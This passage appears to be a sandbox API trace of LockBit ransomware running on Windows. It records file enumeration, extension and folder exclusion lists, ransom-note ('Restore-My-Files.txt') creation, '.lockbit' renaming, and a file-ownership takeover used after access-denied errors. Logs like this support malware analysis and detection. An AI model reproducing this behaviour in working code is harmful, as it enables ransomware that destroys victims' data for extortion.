Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu") returned 1 [0082.813] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\Restore-My-Files.txt") returned 94 [0082.813] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.813] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.813] malloc (_Size=0x40068) returned 0x206b860 [0082.813] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.816] GetLastError () returned 0x3e5 [0082.816] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f832d2f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f832d2f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f858e8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0082.816] GetLastError () returned 0x12 [0082.816] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0082.816] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0082.816] lstrcmpiW (lpString1=".", lpString2="oskmenu.xml") returned -1 [0082.816] lstrcmpiW (lpString1="..", lpString2="oskmenu.xml") returned -1 [0082.816] PathFindExtensionW (pszPath="oskmenu.xml") returned=".xml" [0082.816] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0082.816] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0082.817] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0082.818] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0082.818] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="oskmenu.xml") returned 1 [0082.818] lstrcmpiW (lpString1="ntldr", lpString2="oskmenu.xml") returned -1 [0082.818] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="oskmenu.xml") returned -1 [0082.818] lstrcmpiW (lpString1="bootsect.bak", lpString2="oskmenu.xml") returned -1 [0082.818] lstrcmpiW (lpString1="autorun.inf", lpString2="oskmenu.xml") returned -1 [0082.818] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0082.818] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned=".xml" [0082.818] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0082.818] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0082.818] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0082.819] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0082.819] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0082.819] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0082.819] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0082.819] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0082.820] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0082.821] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0082.821] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit") returned 85 [0082.821] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.821] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit")) returned 0 [0082.821] GetLastError () returned 0x5 [0082.821] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0082.822] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0082.822] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.822] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0082.822] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0082.822] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0082.823] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0082.823] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0083.355] NtClose (Handle=0x3c4) returned 0x0 [0083.355] RtlFreeAnsiString (AnsiString="\\") [0083.355] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0083.355] malloc (_Size=0x200) returned 0x53fcc0 [0083.355] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0083.355] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0083.355] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0083.355] CloseHandle (hObject=0x3c4) returned 1 [0083.355] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0083.356] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0083.356] free (_Block=0x53fcc0) [0083.356] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0083.356] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit")) returned 1 [0083.357] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0083.357] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0083.357] malloc (_Size=0x40068) returned 0x206b860 [0083.357] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=215) returned 1 [0083.357] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0083.370] GetLastError () returned 0x3e5 [0083.370] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0083.370] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0083.371] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.371] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0083.371] lstrcmpiW (lpString1=".", lpString2="osknumpad") returned -1 [0083.371] lstrcmpiW (lpString1="..", lpString2="osknumpad") returned -1 [0083.371] lstrcmpiW (lpString1="osknumpad", lpString2="$windows.~bt") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="intel") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="msocache") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="$recycle.bin") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="$windows.~ws") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="tor browser") returned -1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="boot") returned 1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="system volume information") returned -1 [0083.372] lstrcmpiW (lpString1="osknumpad", lpString2="perflogs") returned -1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="google") returned 1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="application data") returned 1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="windows") returned -1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="windows.old") returned -1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="appdata") returned 1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="Windows nt") returned -1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="Msbuild") returned 1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="Microsoft") returned 1 [0083.373] lstrcmpiW (lpString1="osknumpad", lpString2="All users") returned 1 [0083.374] lstrcmpiW (lpString1="osknumpad", lpString2="mozilla") returned 1 [0083.374] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 75 [0083.374] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*") returned 77 [0083.374] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0084.935] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.935] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0084.936] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0084.936] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.936] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0084.936] lstrcmpiW (lpString1=".", lpString2="osknumpadbase.xml") returned -1 [0084.936] lstrcmpiW (lpString1="..", lpString2="osknumpadbase.xml") returned -1 [0084.936] PathFindExtensionW (pszPath="osknumpadbase.xml") returned=".xml" [0084.936] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0084.936] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0084.937] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0084.938] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0084.938] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="osknumpadbase.xml") returned 1 [0084.938] lstrcmpiW (lpString1="ntldr", lpString2="osknumpadbase.xml") returned -1 [0084.938] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="osknumpadbase.xml") returned -1 [0084.938] lstrcmpiW (lpString1="bootsect.bak", lpString2="osknumpadbase.xml") returned -1 [0084.938] lstrcmpiW (lpString1="autorun.inf", lpString2="osknumpadbase.xml") returned -1 [0084.938] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\") returned="" [0084.938] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned=".xml" [0084.938] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0084.938] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0084.938] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0084.939] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0084.939] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit") returned 101 [0084.939] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0084.939] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit")) returned 0 [0084.941] GetLastError () returned 0x5 [0084.942] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0084.942] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0084.942] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.943] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0084.943] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0084.943] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), Attributes=0x0, 